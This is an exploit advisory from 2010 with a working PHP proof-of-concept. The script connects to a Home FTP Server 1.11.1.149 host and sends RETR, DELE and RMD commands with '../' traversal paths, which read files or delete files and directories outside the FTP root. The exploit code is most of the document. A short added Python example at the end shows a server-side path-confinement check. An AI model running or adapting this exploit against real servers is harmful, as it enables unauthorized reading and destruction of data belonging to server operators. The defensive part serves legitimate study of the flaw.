Home FTP Server v1.11.1.149 RETR DELE RMD Remote Directory Traversal Exploit
Source: inv0ked.israel@gmail.com Author: Pr0T3cT10n Published: 2010-11-01

<?php
#     _             ____  __            __    ___
#    (_)____ _   __/ __ \/ /_____  ____/ /  _/_/ |
#   / // __ \ | / / / / / //_/ _ \/ __  /  / / / /
#  / // / / / |/ / /_/ / ,< /  __/ /_/ /  / / / /
# /_//_/ /_/|___/\____/_/|_|\___/\__,_/  / /_/_/ 
#                   Live by the byte     |_/_/ 
#
# Members:
#
# Pr0T3cT10n
# -=M.o.B.=-
# TheLeader
# Sro
#
# Contact: inv0ked.israel@gmail.com
#
# -----------------------------------
# The following is a proof of concept exploit for a path traversal vulnerability that exists in Home FTP Server.
# The vulnerability allows an unprivileged attacker to read files, and to delete files and folders, that they have no permission to access.
# The vulnerable FTP commands are:
# * RETR  - Read File
# * DELE  - Delete File
# * RMD  - Remove Directory
#-----------------------------------
# Exploit Title: Home FTP Server v1.11.1.149 Remote Directory Traversal Exploit
# Date: 31/10/2010
# Author: Pr0T3cT10n
# Software Link: http://downstairs.dnsalias.net/files/HomeFtpServerInstall.exe
# Affected Version: 1.11.1.149
# Tested on Windows XP Hebrew, Service Pack 3
# ISRAEL, NULLBYTE.ORG.IL
###

error_reporting(E_ALL);
if(count($argv) <= 4) {
 echo("\r\n# Usage: {$argv[0]} [HOST] [PORT] [USER] [PASS]\r\n");
 echo("\tHOST - A host using Home FTP Server\r\n");
 echo("\tPORT - Default is 21\r\n");
 echo("\tUSER - Username\r\n");
 echo("\tPASS - Password\r\n");
 exit("\r\n");
} else {
 $CMD = '';
 $CFG = Array('file' => $argv[0], 'host' => $argv[1], 'port' => $argv[2], 'user' => $argv[3], 'pass' => $argv[4]);
 $sock = fsockopen($CFG['host'], $CFG['port'], $errno, $errstr, 5);
 if($sock) {
  echo("(+) Connected to the FTP server at '{$CFG['host']}' on port {$CFG['port']}\r\n");
  $read = fread($sock, 1024);
  fwrite($sock, "USER {$CFG['user']}\r\n");
  $read = fread($sock, 1024);
  fwrite($sock, "PASS {$CFG['pass']}\r\n");
  $read = fread($sock, 1024);
  echo("(~) What would you like to do?\r\n\t1.Remove File\r\n\t2.Remove Directory\r\n\t3.Read File\r\n");
  $CHSE = rtrim(fgets(STDIN));
  if($CHSE == 1) {
   $CMD.= "DELE";
   echo("(~) Path to file(for example: ../../../test.txt): ");
   $PATH = rtrim(fgets(STDIN));
   if($PATH != '') {
    fwrite($sock, "{$CMD} {$PATH}\r\n");
    echo(fread($sock, 1024));
   } else {
    exit("(-) Empty path.\r\n");
   }
  } elseif($CHSE == 2) {
   $CMD.= "RMD";
   echo("(~) Path to directory(for example: ../../../test): ");
   $PATH = rtrim(fgets(STDIN));
   if($PATH != '') {
    fwrite($sock, "{$CMD} {$PATH}\r\n");
    echo(fread($sock, 1024));
   } else {
    exit("(-) Empty path.\r\n");
   }
  } elseif($CHSE == 3) {
   $CMD.= "RETR";
   echo("(~) Path to file(for example: ../../../test.txt): ");
   $PATH = rtrim(fgets(STDIN));
   if($PATH != '') {
    fwrite($sock, "PASV\r\n");
    $read = fread($sock, 1024);
    $xpld = explode(',', $read);
    $addr_tmp = explode('(', $xpld[0]);
    $address = "{$addr_tmp[1]}.{$xpld[1]}.{$xpld[2]}.{$xpld[3]}";
    $port_tmp = explode(')', $xpld[5]);
    $newport = ($xpld[4]*256)+$port_tmp[0];
    fwrite($sock, "{$CMD} {$PATH}\r\n");
    $read = fread($sock, 1024);
    $socket = fsockopen($address, $newport, $errno, $errstr, 5);
    if($socket) {
     echo(fread($socket, 1024));
    }
   } else {
    exit("(-) Empty path.\r\n");
   }
  } else {
   exit("(-) You have to choose correctly.\r\n");
  }
 } else {
  exit("(-) Unable to connect to {$CFG['host']}:{$CFG['port']}\r\n");
 }
}
?>
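
The server-side check whose absence the header describes, as an added example that is not part of the original advisory or of Home FTP Server's code: the argument of RETR, DELE and RMD is resolved against the session's virtual directory and refused if it would leave the FTP root. The names `resolve_virtual`, `vet_command` and `PathEscape` are hypothetical, and the sample paths in the comments are constructed.

```python
import posixpath

# Verbs the advisory lists as affected; a real server would route every
# path-taking verb (CWD, STOR, LIST, ...) through the same check.
GUARDED = {"RETR", "DELE", "RMD"}


class PathEscape(Exception):
    """The argument does not resolve to a location inside the FTP root."""


def resolve_virtual(cwd, arg):
    """Resolve `arg` against virtual directory `cwd`; return a path under '/'."""
    if "\x00" in arg:
        raise PathEscape("NUL byte")
    arg = arg.replace("\\", "/")            # Windows accepts both separators
    if len(arg) > 1 and arg[1] == ":":
        raise PathEscape("drive-qualified path")
    joined = arg if arg.startswith("/") else posixpath.join(cwd, arg)
    parts = []
    for seg in joined.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not parts:                   # e.g. "../../../test.txt" from "/"
                raise PathEscape("climbs above root")
            parts.pop()
        elif seg[-1] in " .":               # Win32 strips trailing dots/spaces
            raise PathEscape("ambiguous segment")
        else:
            parts.append(seg)
    return "/" + "/".join(parts)


def vet_command(cwd, line):
    """Return (verb, confined_path) for a control-channel line, or raise."""
    verb, _, arg = line.rstrip("\r\n").partition(" ")
    verb = verb.upper()
    if verb not in GUARDED:
        return verb, None
    if not arg:
        raise PathEscape("missing path")
    return verb, resolve_virtual(cwd, arg)
```

After the confined virtual path is mapped onto the real filesystem, the server should still canonicalise the result and compare it with the real root, since this string check does not see symlinks or junctions.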